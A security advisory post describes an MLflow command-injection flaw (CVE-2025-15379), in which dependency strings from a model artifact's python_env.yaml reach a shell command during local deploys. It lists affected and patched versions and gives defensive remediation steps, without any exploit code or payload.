MLflow patches model artifact command injection in local deploys
TL;DR — MLflow deployments that install model dependencies from untrusted model artifacts can be tricked into executing attacker-controlled shell commands during model deployment when env_manager=LOCAL.
What happened
MLflow is an open-source platform for managing the ML lifecycle (tracking, packaging, and deploying models). CVE-2025-15379 describes a critical command injection in MLflow’s model serving container initialization path: when deploying a model with env_manager=LOCAL, MLflow reads dependency strings from the model artifact’s python_env.yaml and (in affected versions) interpolates them into a shell command without sanitization.
In practice, this makes the model artifact itself a code-execution vehicle: a malicious or tampered artifact can provide dependency entries that break out of the intended pip install behavior and run arbitrary commands on the system performing the deployment.
This is a high-blast-radius pattern for ML/DevOps environments: “install dependencies from artifacts” is a common pipeline step, and artifact provenance is frequently weaker than source provenance—turning dependency installation into an RCE primitive is exactly the kind of supply-chain adjacent risk platform teams need to treat as production-critical.
Who is impacted
- Teams using
mlflowin deployments where models are deployed withenv_manager=LOCALand dependencies are installed from model artifacts. - Environments that accept models from semi-trusted/untrusted sources (shared registries, multi-tenant model catalogs, external contributors, CI-published artifacts).
| Source | Affected versions | Patched / unaffected |
|---|---|---|
| CVE record (huntr CNA via CVEProject) | < 3.8.2 (custom version scheme); description calls out 3.8.0 | 3.8.2 |
What to do now
- Follow vendor remediation guidance and apply a release that includes the fix.
-
"The vulnerability affects versions 3.8.0 and is fixed in version 3.8.2."
-
- Inventory where
mlflowis used to deploy/serve models and identify any pipelines usingenv_manager=LOCAL(especially automated promotion to staging/prod). - Treat model artifacts as potentially hostile inputs until you can patch:
- Restrict who can publish/replace model artifacts in registries used by production deployers.
- Add provenance controls (signing/attestation) and require verification before deploy.
- If you suspect exposure, review deployment job logs for unexpected dependency strings and rotate credentials accessible to the MLflow deployment environment (cloud tokens, registry creds, data-store keys).
Content is AI-assisted and reviewed by our team, but issues may be missed and best practices evolve rapidly, send corrections to [email protected]. Always consult official documentation and validate key implementation decisions before making design or security choices.
